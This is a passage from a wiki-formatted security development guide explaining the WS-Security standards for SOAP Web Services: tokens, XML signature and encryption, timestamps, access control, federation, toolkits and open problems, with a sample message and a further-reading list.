''      &amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...				''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/saml:Assertion&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsu:Timestamp&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;dsig:Signature xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot; Id=&amp;quot;sb738c7&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;dsig:SignedInfo Id=&amp;quot;obLkHzaCOrAW4kxC9az0bLA22&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;dsig:Reference URI=&amp;quot;#s91397860&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...									''&lt;br /&gt;
&lt;br /&gt;
''            &amp;lt;dsig:DigestValue&amp;gt;5R3GSp+OOn17lSdE0knq4GXqgYM=&amp;lt;/dsig:DigestValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;/dsig:Reference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;/dsig:SignedInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;dsig:SignatureValue Id=&amp;quot;a9utKU9UZk&amp;quot;&amp;gt;LIkagbCr5bkXLs8l...&amp;lt;/dsig:SignatureValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;dsig:KeyInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        &amp;lt;/dsig:KeyInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/dsig:Signature&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;/wsse:Security&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;/soap:Header&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;soap:Body xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; wsu:Id=&amp;quot;s91397860&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;xenc:EncryptedData xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot; Id=&amp;quot;aDNa2iD&amp;quot; Type=&amp;quot;http://www.w3.org/2001/04/xmlenc#Content&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#tripledes-cbc&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;xenc:CipherValue&amp;gt;XFM4J6C...&amp;lt;/xenc:CipherValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;/xenc:EncryptedData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;/soap:Body&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;/soap:Envelope&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
===Types of tokens ===&lt;br /&gt;
&lt;br /&gt;
A WSS Header may have the following types of security tokens in it:&lt;br /&gt;
&lt;br /&gt;
* Username token&lt;br /&gt;
&lt;br /&gt;
Defines mechanisms to pass username and, optionally, a password - the latter is described in the username profile document. Unless the whole token is encrypted, a message which includes a clear-text password should always be transmitted via a secured channel. In situations where the target Web Service has access to clear-text passwords for verification (this might not be possible with LDAP or some other user directories, which do not return clear-text passwords), using a hashed version with nonce and a timestamp is generally preferable. The profile document defines an unambiguous algorithm for producing password hash: &lt;br /&gt;
&lt;br /&gt;
''Password_Digest = Base64 ( SHA-1 ( nonce + created + password ) )''&lt;br /&gt;
&lt;br /&gt;
* Binary token&lt;br /&gt;
&lt;br /&gt;
They are used to convey binary data, such as X.509 certificates, in a text-encoded format, Base64 by default. The core specification defines BinarySecurityToken element, while profile documents specify additional attributes and sub-elements to handle attachment of various tokens. Presently, both the X.509 and the Kerberos profiles have been adopted.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        MIICtzCCAi...''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsse:BinarySecurityToken&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* XML token&lt;br /&gt;
&lt;br /&gt;
These are meant for any kind of XML-based tokens, but primarily – for SAML assertions. The core specification merely mentions the possibility of inserting such tokens, leaving all details to the profile documents. At the moment, SAML 1.1 profile has been accepted by OASIS.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...				''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;/saml:Assertion&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Although technically it is not a security token, a Timestamp element may be inserted into a security header to ensure message’s freshness. See the further reading section for a design pattern on this.&lt;br /&gt;
&lt;br /&gt;
===Referencing message parts ===&lt;br /&gt;
&lt;br /&gt;
In order to retrieve security tokens, passed in the message, or to identify signed and encrypted message parts, the core specification adopts usage of a special attribute, wsu:Id. The only requirement on this attribute is that the values of such IDs should be unique within the scope of XML document where they are defined. Its application has a significant advantage for the intermediate processors, as it does not require understanding of the message’s XML Schema. Unfortunately, XML Signature and Encryption specifications do not allow for attribute extensibility (i.e. they have closed schema), so, when trying to locate signature or encryption elements, local IDs of the Signature and Encryption elements must be considered first.&lt;br /&gt;
&lt;br /&gt;
WSS core specification also defines a general mechanism for referencing security tokens via SecurityTokenReference element. An example of such element, referring to a SAML assertion in the same header, is provided below:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sGbRpXLySzgM1X6aSjg22&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''            1106844369755''&lt;br /&gt;
&lt;br /&gt;
''          &amp;lt;/wsse:KeyIdentifier&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;/wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
As this element was designed to refer to pretty much any possible token type (including encryption keys, certificates, SAML assertions, etc) both internal and external to the WSS Header, it is enormously complicated. The specification recommends using two of its possible four reference types – Direct References (by URI) and Key Identifiers (some kind of token identifier). Profile documents (SAML, X.509 for instance) provide additional extensions to these mechanisms to take advantage of specific qualities of different token types.&lt;br /&gt;
&lt;br /&gt;
==Communication Protection Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
As was already explained earlier (see 0), channel security, while providing important services, is not a panacea, as it does not solve many of the issues facing Web Service developers. WSS helps addressing some of them at the SOAP message level, using the mechanisms described in the sections below.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Integrity ===&lt;br /&gt;
&lt;br /&gt;
WSS specification makes use of the XML-dsig standard to ensure message integrity, restricting its functionality in certain cases; for instance, only explicitly referenced elements can be signed (i.e. no Embedding or Embedded signature modes are allowed). Prior to signing an XML document, a transformation is required to create its canonical representation, taking into account the fact that XML documents can be represented in a number of semantically equivalent ways. There are two main transformations defined by the XML Digital Signature WG at W3C, Inclusive and Exclusive Canonicalization Transforms (C14N and EXC-C14N), which differ in the way namespace declarations are processed. The WSS core specification specifically recommends using EXC-C14N, as it allows copying signed XML content into other documents without invalidating the signature.&lt;br /&gt;
&lt;br /&gt;
In order to provide a uniform way of addressing signed tokens, WSS adds a Security Token Reference (STR) Dereference Transform option, which is comparable with dereferencing a pointer to an object of specific data type in programming languages. Similarly, in addition to the XML Signature-defined ways of addressing signing keys, WSS allows for references to signing security tokens through the STR mechanism (explained in 0), extended by token profiles to accommodate specific token types. A typical signature example is shown in an earlier sample in the section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
Typically, an XML signature is applied to secure elements such as SOAP Body and the timestamp, as well as any user credentials, passed in the request. There is an interesting twist when a particular element is both signed and encrypted, since these operations may follow (even repeatedly) in any order, and knowledge of their ordering is required for signature verification. To address this issue, the WSS core specification requires that each new element is pre-pended to the security header, thus defining the “natural” order of operations. A particularly nasty problem arises when there are several security headers in a single SOAP message, using overlapping signature and encryption blocks, as there is nothing in this case that would point to the right order of operations.&lt;br /&gt;
&lt;br /&gt;
===Confidentiality ===&lt;br /&gt;
&lt;br /&gt;
For its confidentiality protection, WSS relies on yet another standard, XML Encryption. Similarly to XML-dsig, this standard operates on selected elements of the SOAP message, but it then replaces the encrypted element’s data with a &amp;lt;xenc:EncryptedData&amp;gt; sub-element carrying the encrypted bytes. For encryption efficiency, the specification recommends using a unique key, which is then encrypted by the recipient’s public key and pre-pended to the security header in a &amp;lt;xenc:EncryptedKey&amp;gt; element. A SOAP message with encrypted body is shown in the section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Freshness ===&lt;br /&gt;
&lt;br /&gt;
SOAP messages’ freshness is addressed via timestamp mechanism – each security header may contain just one such element, which states, in UTC time and using the UTC time format, creation and expiration moments of the security header. It is important to realize that the timestamp is applied to the WSS Header, not to the SOAP message itself, since the latter may contain multiple security headers, each with a different timestamp. There is an unresolved problem with this “single timestampt” approach, since, once the timestamp is created and signed, it is impossible to update it without breaking existing signatures, even in case of a legitimate change in the WSS Header.&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsu:Timestamp&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
If a timestamp is included in a message, it is typically signed to prevent tampering and replay attacks. There is no mechanism foreseen to address clock synchronization issue (which, as was already point out earlier, is generally not an issue in modern day systems) – this has to be addressed out-of-band as far as the WSS mechanics is concerned. See the further reading section for a design pattern addressing this issue.&lt;br /&gt;
&lt;br /&gt;
==Access Control Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
When it comes to access control decisions, Web Services do not offer specific protection mechanisms by themselves – they just have the means to carry the tokens and data payloads in a secure manner between source and destination SOAP endpoints. &lt;br /&gt;
&lt;br /&gt;
For more complete description of access control tasks, please, refer to other sections of this Development Guide.&lt;br /&gt;
&lt;br /&gt;
===Identification ===&lt;br /&gt;
&lt;br /&gt;
Identification represents a claim to have certain identity, which is expressed by attaching certain information to the message. This can be a username, an SAML assertion, a Kerberos ticket, or any other piece of information, from which the service can infer who the caller claims to be. &lt;br /&gt;
&lt;br /&gt;
WSS represents a very good way to convey this information, as it defines an extensible mechanism for attaching various token types to a message (see 0). It is the receiver’s job to extract the attached token and figure out which identity it carries, or to reject the message if it can find no acceptable token in it.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Authentication ===&lt;br /&gt;
&lt;br /&gt;
Authentication can come in two flavors – credentials verification or token validation. The subtle difference between the two is that tokens are issued after some kind of authentication has already happened prior to the current invocation, and they usually contain user’s identity along with the proof of its integrity. &lt;br /&gt;
&lt;br /&gt;
WSS offers support for a number of standard authentication protocols by defining binding mechanism for transmitting protocol-specific tokens and reliably linking them to the sender. However, the mechanics of proof that the caller is who he claims to be is completely at the Web Service’s discretion. Whether it takes the supplied username and password’s hash and checks it against the backend user store, or extracts subject name from the X.509 certificate used for signing the message, verifies the certificate chain and looks up the user in its store – at the moment, there are no requirements or standards which would dictate that it should be done one way or another. &lt;br /&gt;
&lt;br /&gt;
===Authorization ===&lt;br /&gt;
&lt;br /&gt;
XACML may be used for expressing authorization rules, but its usage is not Web Service-specific – it has much broader scope. So, whatever policy or role-based authorization mechanism the host server already has in place will most likely be utilized to protect the deployed Web Services deployed as well. &lt;br /&gt;
&lt;br /&gt;
Depending on the implementation, there may be several layers of authorization involved at the server. For instance, JSRs 224 (JAX-RPC 2.0) and 109 (Implementing Enterprise Web Services), which define Java binding for Web Services, specify implementing Web Services in J2EE containers. This means that when a Web Service is accessed, there will be a URL authorization check executed by the J2EE container, followed by a check at the Web Service layer for the Web Service-specific resource. Granularity of such checks is implementation-specific and is not dictated by any standards. In the Windows universe it happens in a similar fashion, since IIS is going to execute its access checks on the incoming HTTP calls before they reach the ASP.NET runtime, where SOAP message is going to be further decomposed and analyzed.&lt;br /&gt;
&lt;br /&gt;
===Policy Agreement ===&lt;br /&gt;
&lt;br /&gt;
Normally, Web Services’ communication is based on the endpoint’s public interface, defined in its WSDL file. This descriptor has sufficient details to express SOAP binding requirements, but it does not define any security parameters, leaving Web Service developers struggling to find out-of-band mechanisms to determine the endpoint’s security requirements. &lt;br /&gt;
&lt;br /&gt;
To make up for these shortcomings, WS-Policy specification was conceived as a mechanism for expressing complex policy requirements and qualities, sort of WSDL on steroids. Through the published policy SOAP endpoints can advertise their security requirements, and their clients can apply appropriate measures of message protection to construct the requests. The general WS-Policy specification (actually comprised of three separate documents) also has extensions for specific policy types, one of them – for security, WS-SecurityPolicy.&lt;br /&gt;
&lt;br /&gt;
If the requestor does not possess the required tokens, it can try obtaining them via trust mechanism, using WS-Trust-enabled services, which are called to securely exchange various token types for the requested identity. &lt;br /&gt;
&lt;br /&gt;
[[Image: Using Trust Service.gif|Figure 5. Using Trust service]]&lt;br /&gt;
&lt;br /&gt;
Unfortunately, both WS-Policy and WS-Trust specifications have not been submitted for standardization to public bodies, and their development is progressing via private collaboration of several companies, although it was opened up for other participants as well. As a positive factor, there have been several interoperability events conducted for these specifications, so the development process of these critical links in the Web Services’ security infrastructure is not a complete black box.&lt;br /&gt;
&lt;br /&gt;
==Forming Web Service Chains ==&lt;br /&gt;
&lt;br /&gt;
Many existing or planned implementations of SOA or B2B systems rely on dynamic chains of Web Services for accomplishing various business specific tasks, from taking the orders through manufacturing and up to the distribution process. &lt;br /&gt;
&lt;br /&gt;
[[Image:Service Chain.gif|Figure 6: Service chain]]&lt;br /&gt;
&lt;br /&gt;
This is in theory. In practice, there are a lot of obstacles hidden among the way, and one of the major ones among them – security concerns about publicly exposing processing functions to intra- or Internet-based clients. &lt;br /&gt;
&lt;br /&gt;
Here are just a few of the issues that hamper Web Services interaction – incompatible authentication and authorization models for users, amount of trust between services themselves and ways of establishing such trust, maintaining secure connections, and synchronization of user directories or otherwise exchanging users’ attributes. These issues will be briefly tackled in the following paragraphs.&lt;br /&gt;
&lt;br /&gt;
===Incompatible user access control models ===&lt;br /&gt;
&lt;br /&gt;
As explained earlier, in section 0, Web Services themselves do not include separate extensions for access control, relying instead on the existing security framework. What they do provide, however, are mechanisms for discovering and describing security requirements of a SOAP service (via WS-Policy), and for obtaining appropriate security credentials via WS-Trust based services.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Service trust ===&lt;br /&gt;
&lt;br /&gt;
In order to establish mutual trust between client and service, they have to satisfy each other’s policy requirements. A simple and popular model is mutual certificate authentication via SSL, but it is not scalable for open service models, and supports only one authentication type. Services that require more flexibility have to use pretty much the same access control mechanisms as with users to establish each other’s identities prior to engaging in a conversation.&lt;br /&gt;
&lt;br /&gt;
===Secure connections ===&lt;br /&gt;
&lt;br /&gt;
Once trust is established it would be impractical to require its confirmation on each interaction. Instead, a secure client-server link is formed and maintained the entire time a client’s session is active. Again, the most popular mechanism today for maintaining such link is SSL, but it is not a Web Service-specific mechanism, and it has a number of shortcomings when applied to SOAP communication, as explained in 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Synchronization of user directories ===&lt;br /&gt;
&lt;br /&gt;
This is a very acute problem when dealing with cross-domain applications, as users’ population tends to change frequently among different domains. So, how does a service in domain B decide whether it is going to trust user’s claim that he has been already authenticated in domain A? There exist different aspects of this problem. First – a common SSO mechanism, which implies that a user is known in both domains (through synchronization, or by some other means), and authentication tokens from one domain are acceptable in another. In Web Services world, this would be accomplished by passing around a SAML or Kerberos token for a user. &lt;br /&gt;
&lt;br /&gt;
===Domain federation ===&lt;br /&gt;
&lt;br /&gt;
Another aspect of the problem is when users are not shared across domains, but merely the fact that a user with certain ID has successfully authenticated in another domain, as would be the case with several large corporations, which would like to form a partnership, but would be reluctant to share customers’ details. The decision to accept this request is then based on the inter-domain procedures, establishing special trust relationships and allowing for exchanging such opaque tokens, which would be an example of Federation relationships. Of those efforts, most notable example is Liberty Alliance project, which is now being used as a basis for SAML 2.0 specifications. The work in this area is still far from being completed, and most of the existing deployments are nothing more than POC or internal pilot projects than to real cross-companies deployments, although LA’s website does list some case studies of large-scale projects.&lt;br /&gt;
&lt;br /&gt;
==Available Implementations ==&lt;br /&gt;
&lt;br /&gt;
It is important to realize from the beginning that no security standard by itself is going to provide security to the message exchanges – it is the installed implementations, which will be assessing conformance of the incoming SOAP messages to the applicable standards, as well as appropriately securing the outgoing messages.&lt;br /&gt;
&lt;br /&gt;
===.NET – Web Service Extensions ===&lt;br /&gt;
&lt;br /&gt;
Since new standards are being developed at a rather quick pace, .NET platform is not trying to catch up immediately, but uses Web Service Extensions (WSE) instead. WSE, currently at the version 2.0, adds development and runtime support for the latest Web Service security standards to the platform and development tools, even while they are still “work in progress”. Once standards mature, their support is incorporated into new releases of the .NET platform, which is what is going to happen when .NET 2.0 finally sees the world. The next release of WSE, 3.0, is going to coincide with VS.2005 release and will take advantages of the latest innovations of .NET 2.0 platform in messaging and Web Application areas.&lt;br /&gt;
&lt;br /&gt;
Considering that Microsoft is one of the most active players in the Web Service security area and recognizing its influence in the industry, its WSE implementation is probably one of the most complete and up to date, and it is strongly advisable to run at least a quick interoperability check with WSE-secured .NET Web Service clients. If you have a Java-based Web Service, and the interoperability is a requirement (which is usually the case), in addition to the questions of security testing one needs to keep in mind the basic interoperability between Java and .NET Web Service data structures. &lt;br /&gt;
&lt;br /&gt;
This is especially important since current versions of .NET Web Service tools frequently do not cleanly handle WS-Security’s and related XML schemas as published by OASIS, so some creativity on the part of a Web Service designer is needed. That said – WSE package itself contains very rich and well-structured functionality, which can be utilized both with ASP.NET-based and standalone Web Service clients to check incoming SOAP messages and secure outgoing ones at the infrastructure level, relieving Web Service programmers from knowing these details. Among other things, WSE 2.0 supports the most recent set of WS-Policy and WS-Security profiles, providing for basic message security and WS-Trust with WS-SecureConversation. Those are needed for establishing secure exchanges and sessions - similar to what SSL does at the transport level, but applied to message-based communication.&lt;br /&gt;
&lt;br /&gt;
===Java toolkits ===&lt;br /&gt;
&lt;br /&gt;
Most of the publicly available Java toolkits work at the level of XML security, i.e. XML-dsig and XML-enc – such as IBM’s XML Security Suite and Apache’s XML Security Java project. Java’s JSR 105 and JSR 106 (still not finalized) define Java bindings for signatures and encryption, which will allow plugging the implementations as JCA providers once work on those JSRs is completed. &lt;br /&gt;
&lt;br /&gt;
Moving one level up, to address Web Services themselves, the picture becomes muddier – at the moment, there are many implementations in various stages of incompleteness. For instance, Apache is currently working on the WSS4J project, which is moving rather slowly, and there is commercial software package from Phaos (now owned by Oracle), which suffers from a lot of implementation problems.&lt;br /&gt;
&lt;br /&gt;
A popular choice among Web Service developers today is Sun’s JWSDP, which includes support for Web Service security. However, its support for Web Service security specifications in the version 1.5 is only limited to implementation of the core WSS standard with username and X.509 certificate profiles. Security features are implemented as part of the JAX-RPC framework and configuration-driven, which allows for clean separation from the Web Service’s implementation.&lt;br /&gt;
&lt;br /&gt;
===Hardware, software systems ===&lt;br /&gt;
&lt;br /&gt;
This category includes complete systems, rather than toolkits or frameworks. On one hand, they usually provide rich functionality right off the shelf, on the other hand – its usage model is rigidly constrained by the solution’s architecture and implementation. This is in contrast to the toolkits, which do not provide any services by themselves, but handing system developers necessary tools to include the desired Web Service security features in their products… or to shoot themselves in the foot by applying them inappropriately.&lt;br /&gt;
&lt;br /&gt;
These systems can be used at the infrastructure layer to verify incoming messages against the effective policy, check signatures, tokens, etc, before passing them on to the target Web Service. When applied to the outgoing SOAP messages, they act as a proxy, now altering the messages to decorate with the required security elements, sign and/or encrypt them.&lt;br /&gt;
&lt;br /&gt;
Software systems are characterized by significant configuration flexibility, but comparatively slow processing. On the bright side, they often provide high level of integration with the existing enterprise infrastructure, relying on the back-end user and policy stores to look at the credentials, extracted from the WSS header, from the broader perspective. An example of such service is TransactionMinder from the former Netegrity – a Policy Enforcement Point for Web Services behind it, layered on top of the Policy Server, which makes policy decisions by checking the extracted credentials against the configured stores and policies.&lt;br /&gt;
&lt;br /&gt;
For hardware systems, performance is the key – they have already broken gigabyte processing threshold, and allow for real-time processing of huge documents, decorated according to the variety of the latest Web Service security standards, not only WSS. The usage simplicity is another attractive point of those systems - in the most trivial cases, the hardware box may be literally dropped in, plugged, and be used right away. These qualities come with a price, however – this performance and simplicity can be achieved as long as the user stays within the pre-configured confines of the hardware box. The moment he tries to integrate with the back-end stores via callbacks (for those solutions that have this capability, since not all of them do), most of the advantages are lost. As an example of such hardware device, Layer 7 Technologies provides a scalable SecureSpan Networking Gateway, which acts both as the inbound firewall and the outbound proxy to handle XML traffic in real time.&lt;br /&gt;
&lt;br /&gt;
==Problems ==&lt;br /&gt;
&lt;br /&gt;
As is probably clear from the previous sections, Web Services are still experiencing a lot of turbulence, and it will take a while before they can really catch on. Here is a brief look at what problems surround currently existing security standards and their implementations.&lt;br /&gt;
&lt;br /&gt;
===Immaturity of the standards ===&lt;br /&gt;
&lt;br /&gt;
Most of the standards are either very recent (couple years old at most), or still being developed. Although standards development is done in committees, which, presumably, reduces risks by going through an exhaustive reviewing and commenting process, some error scenarios still slip in periodically, as no theory can possibly match the testing resulting from pounding by thousands of developers working in the real field. &lt;br /&gt;
&lt;br /&gt;
Additionally, it does not help that for political reasons some of these standards are withheld from public process, which is the case with many standards from the WSA arena (see 0), or that some of the efforts are duplicated, as was the case with LA and WS-Federation specifications.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Performance ===&lt;br /&gt;
&lt;br /&gt;
XML parsing is a slow task, which is an accepted reality, and SOAP processing slows it down even more. Now, with expensive cryptographic and textual conversion operations thrown into the mix, these tasks become a performance bottleneck, even with the latest crypto- and XML-processing hardware solutions offered today. All of the products currently on the market are facing this issue, and they are trying to resolve it with varying degrees of success. &lt;br /&gt;
&lt;br /&gt;
Hardware solutions, while substantially (by orders of magnitude) improving the performance, cannot always be used as an optimal solution, as they cannot be easily integrated with the already existing back-end software infrastructure, at least – not without making performance sacrifices. Another consideration whether hardware-based systems are the right solution – they are usually highly specialized in what they are doing, while modern Application Servers and security frameworks can usually offer a much greater variety of protection mechanisms, protecting not only Web Services, but also other deployed applications in a uniform and consistent way.&lt;br /&gt;
&lt;br /&gt;
===Complexity and interoperability ===&lt;br /&gt;
&lt;br /&gt;
As could be deduced from the previous sections, Web Service security standards are fairly complex, and have very steep learning curve associated with them. Most of the current products, dealing with Web Service security, suffer from very mediocre usability due to the complexity of the underlying infrastructure. Configuring all different policies, identities, keys, and protocols takes a lot of time and good understanding of the involved technologies, as most of the times errors that end users are seeing have very cryptic and misleading descriptions. &lt;br /&gt;
&lt;br /&gt;
In order to help administrators and reduce security risks from service misconfigurations, many companies develop policy templates, which group together best practices for protecting incoming and outgoing SOAP messages. Unfortunately, this work is not currently on the radar of any of the standard’s bodies, so it appears unlikely that such templates will be released for public use any time soon. Closest to this effort may be WS-I’s Basic Security Profile (BSP), which tries to define the rules for better interoperability among Web Services, using a subset of common security features from various security standards like WSS. However, this work is not aimed at supplying the administrators with ready for deployment security templates matching the most popular business use cases, but rather at establishing the least common denominator.&lt;br /&gt;
&lt;br /&gt;
===Key management ===&lt;br /&gt;
&lt;br /&gt;
Key management usually lies at the foundation of any other security activity, as most protection mechanisms rely on cryptographic keys one way or another. While Web Services have XKMS protocol for key distribution, local key management still presents a huge challenge in most cases, since PKI mechanism has a lot of well-documented deployment and usability issues. Those systems that opt to use homegrown mechanisms for key management run significant risks in many cases, since questions of storing, updating, and recovering secret and private keys more often than not are not adequately addressed in such solutions.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* SearchSOA, SOA needs practical operational governance, Toufic Boubez&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://searchsoa.techtarget.com/news/interview/0,289202,sid26_gci1288649,00.html?track=NL-110&amp;amp;ad=618937&amp;amp;asrc=EM_NLN_2827289&amp;amp;uid=4724698&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Whitepaper: Securing XML Web Services: XML Firewalls and XML VPNs&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://layer7tech.com/new/library/custompage.html?id=4&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* eBizQ, The Challenges of SOA Security, Peter Schooff&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.ebizq.net/blogs/news_security/2008/01/the_complexity_of_soa_security.php&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Piliptchouk, D., WS-Security in the Enterprise, O’Reilly ONJava&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/02/09/wssecurity.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/03/30/wssecurity2.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* WS-Security OASIS site&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.oasis-open.org/committees/tc_home.php?wg_abbrev=wss&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Microsoft, ''What’s new with WSE 3.0''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://msdn.microsoft.com/webservices/webservices/building/wse/default.aspx?pull=/library/en-us/dnwse/html/newwse3.asp&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Eoin Keary, Preventing DOS attacks on web services&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;https://www.threatsandcountermeasures.com/wiki/default.aspx/ThreatsAndCountermeasuresCommunityKB.PreventingDOSAttacksOnWebServices&amp;lt;/u&amp;gt;&lt;br /&gt;
